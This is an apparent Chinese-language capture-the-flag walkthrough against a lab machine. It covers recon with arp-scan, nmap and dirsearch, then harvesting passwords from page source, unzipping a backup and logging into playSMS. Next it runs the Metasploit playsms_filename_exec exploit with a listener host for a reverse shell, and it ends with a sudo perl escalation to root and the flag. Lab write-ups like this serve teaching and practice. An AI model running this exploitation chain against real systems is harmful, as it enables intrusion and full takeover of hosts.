查看靶机的MAC地址:
一、信息收集
扫描目标主机
arp-scan -l
使用扫描nmap扫描目标靶机开放的端口
nmap -sV -p- 192.168.7.85
浏览器访问80端口
使用dirsearch扫描目录
dirsearch -u http://192.168.7.85/
拼接/robots.txt
拼接/nothing,查看页面源代码,发现了一些密码信息
freedom
password
helloworld!
diana
iloveroot
拼接/secure/,出现一个压缩包文件,点击,将其下载到本地查看
解压时发现需要输入密码,尝试用上面得到的密码解压backup.zip文件,发现freedom可以
解压之后发现是一个mp3文件,播放时发现已损坏,右键将其用记事本打开,发现了一个用户名:touhid和url:/SecreTSMSgatwayLogin
拼接发现的url:/SecreTSMSgatwayLogin,发现了一个登录框
使用用户名:touhid和上方得到的密码信息分别尝试登录(!!!火狐登不上试试其他浏览器)
经测试,账户:touhid,密码:diana
二、Getshell
利用msf工具搜索相关框架漏洞
msfconsole
search playSMS
use exploit/multi/http/playsms_filename_exec
show options
set rhosts 192.168.7.85 #靶机IP
set targeturi /SecreTSMSgatwayLogin
set username touhid
set password diana
set lhost 192.168.7.251 #监听机IP
run
三、权限提升
切换交互式shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
sudo提权
sudo -l #查看可执行的命令
在线网站:GTFOBins
sudo perl -e 'exec "/bin/sh";'
提权成功!
成功得到flag{22d06624cd604a0626eb5a2992a6f2e6}